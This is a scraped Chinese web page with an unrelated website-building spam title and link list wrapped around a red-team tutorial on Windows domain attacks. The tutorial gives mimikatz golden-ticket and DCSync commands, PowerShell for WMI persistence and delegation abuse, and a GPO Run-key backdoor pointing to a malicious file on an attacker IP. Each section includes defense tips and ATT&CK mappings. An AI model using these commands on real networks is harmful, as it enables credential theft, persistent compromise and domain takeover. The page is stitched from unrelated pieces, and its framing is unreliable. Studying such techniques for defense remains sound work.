当前位置: 首页 > news >正文

智慧小区网站建设网站如何快速备案

智慧小区网站建设,网站如何快速备案,网站 单页,重庆百度提升优化技术要点 漏洞关联与武器化 利用Nessus或Nuclei扫描结果,提取未修复漏洞(如MS17-010、CVE-2020-1472)生成攻击链; 通过Metasploit模块自动化匹配漏洞与内网资产: msf6> db_import nmap_scan.xml msf6> vulns …
技术要点
  1. 漏洞关联与武器化
  • 利用NessusNuclei扫描结果,提取未修复漏洞(如MS17-010、CVE-2020-1472)生成攻击链;

  • 通过Metasploit模块自动化匹配漏洞与内网资产:


msf6> db_import nmap_scan.xml msf6> vulns search cve:2020-1472 
  1. 敏感数据聚合分析
  • 使用PowerSploit提取邮箱、共享文件中的关键词(如"password"、“token”);

  • 结合Elasticsearch搭建日志分析平台,定位管理员活动轨迹(RDP登录、文件修改)。

实战场景
  • 场景:基于Kerberos委派的权限升级
  1. 发现域内配置约束委派的服务账户:

Get-ADComputer -Filter {msDS-AllowedToDelegateTo -ne "$null"} -Properties msDS-AllowedToDelegateTo 
  1. 伪造S4U请求获取高权限票据,接管目标服务(如SQL Server)。
防御建议
  • 禁用非必要的Kerberos委派配置,定期审查msDS-AllowedToDelegateTo属性;

  • 部署UEBA(用户实体行为分析)监控异常数据访问模式;

  • 对漏洞扫描工具生成的报告进行敏感字段脱敏。


A-05-01 | 持久化后门与隐蔽通道技术

技术要点
  1. 无文件后门技术
  • 计划任务注入:利用WMI事件订阅实现重启后门(工具:WMIEvent);

  • 注册表映像劫持:修改Debugger键值劫持合法进程(如劫持notepad.exe加载恶意DLL)。

  1. 隐蔽通信设计
  • 基于HTTPS的C2心跳:使用Let’s Encrypt证书加密通信(工具:Cobalt Strike);

  • 合法协议滥用:通过ICMP/TCP协议伪装为CDN流量(如Cloudflare反向代理)。

实战场景
  • 场景:WMI事件订阅持久化
  1. 创建永久事件过滤器与消费者:

$filterArgs = @{ Name = '恶意事件过滤器'; EventNamespace = 'root\cimv2'; Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'" } $consumerArgs = @{ Name = '恶意消费者'; CommandLineTemplate = "C:\Windows\System32\calc.exe" } Set-WmiInstance -Class __EventFilter -Arguments $filterArgs Set-WmiInstance -Class CommandLineEventConsumer -Arguments $consumerArgs 
  1. 关联过滤器与消费者,实现系统级驻留。
防御建议
  • 监控WMI永久事件订阅(工具:Sysinternals Autoruns);

  • 限制注册表HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options写入权限;

  • 部署网络流量基线分析,识别异常心跳周期。


A-06-01 | 域环境攻击链(黄金票据/DC Sync/组策略利用)

技术要点
  1. 黄金票据伪造
  • 利用域控KRBTGT账户的NTLM哈希生成万能票据:

mimikatz "kerberos::golden /domain:test.com /sid:S-1-5-21-123456789 /krbtgt:xxxx /user:administrator /ptt" 
  • 绕过Kerberos PAC验证(需禁用KDC签名验证)。
  1. DC Sync攻击
  • 通过DRSUAPI协议模拟域控同步ntds.dit数据:

mimikatz "lsadump::dcsync /domain:test.com /user:Administrator" 
  1. 组策略对象(GPO)滥用
  • 篡改GPO部署恶意启动脚本或注册表项(工具:SharpGPOAbuse)。
实战场景
  • 场景:GPO推送后门至全域主机
  1. 定位具备WriteProperty权限的GPO:

Get-DomainGPO | Get-DomainObjectAcl -ResolveGUIDs | ? { $_.ActiveDirectoryRights -match "WriteProperty" } 
  1. 修改GPO的User\Scripts\Logon脚本路径指向恶意PS1文件:

Set-GPRegistryValue -Name "Default Domain Policy" -Key "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" -ValueName "Update" -Value "\\攻击者IP\恶意脚本.exe" 
防御建议
  • 定期重置KRBTGT账户密码(每30天);

  • 启用“特权账户保护”策略,限制DCSync权限;

  • 监控GPO修改事件(Event ID 5136、5141)及SYSVOL目录变更。


扩展与深化方向

  1. 红蓝对抗升级
  • 针对EDR的绕过技术:进程空洞注入(Process Hollowing)、直接系统调用(Syscall);

  • 防御方可通过内存签名扫描(如YARA规则)检测无文件攻击。

  1. 自动化攻击框架
  • 整合分类体系中的技术点至Cobalt StrikeSliver框架,生成模块化攻击链。
  1. ATT&CK映射

| 技术点 | MITRE ID | 检测建议 |

|-------------------|----------------|--------------------------|

| 黄金票据 | T1558.001 | 监控异常Kerberos TGT请求 |

| DC Sync | T1003.003 | 审核域控DRSUAPI调用来源 |

| GPO后门 | T1484.001 | 对比GPO版本哈希值 |

此部分内容覆盖内网渗透终局阶段的核心技术,建议结合实战靶场(如Vulnstack、AttackRange)进行复现,强化攻防思维闭环。

http://www.dtcms.com/a/523243.html

相关文章:

  • 北京正规网站建设比较昆明大型网页开发企业
  • 忘记网站后台地址嘉兴云推广网站
  • 58做网站一年多少钱阳江网上房地产官网
  • 网站开发定制模板网站建设中装建设公司怎么样
  • 公司名称域名网站八戒网站建设
  • wordpress去掉页眉东营网站优化
  • 运城网站制作公司网站搬家图片怎么做
  • 网站编程培训公司手机参数查询网站
  • 十堰市茅箭区建设局网站海南网站推广
  • 合肥做核酸最新通知淄博网站制作建设优化
  • tk域名网站系统开发定制
  • 网站不收录排名会降吗wordpress文章分组授权
  • 营销型品牌网站建设财务管理咨询
  • .asp 网站shopify建站公司
  • 深圳网站建设公司收费服务器运维
  • 做刷票的网站网站建设案例 杭州远大
  • 完成网站建设的心得体会翻译公司网站建设多少钱
  • 装饰网站卧室做炕百度介绍做ppt高大上图表的网站
  • 网站建设行业如何wordpress缩略图和文章摘要
  • 长沙做网站咨询公司自己制作一个网站需要多少钱
  • 资源网站建设简述电子商务网站建设的基本要求
  • 大理市城乡建设局网站在线crm
  • o2o 网站wordpress的主题下载地址
  • 做100个网站挂广告联盟住小帮装修案例
  • 盘锦威旺做网站建设科技型中小企业服务平台
  • 升腾d9116 做网站wordpress安装说明seo工具好用
  • 青岛网站seo诊断大理中小企业网站建设
  • 苏州相城做网站的建设公司网站需要准备什么
  • 脉脉用的什么技术做网站精品无人区高清不用下载
  • 做美食网站的模板wordpress首页新闻显示数量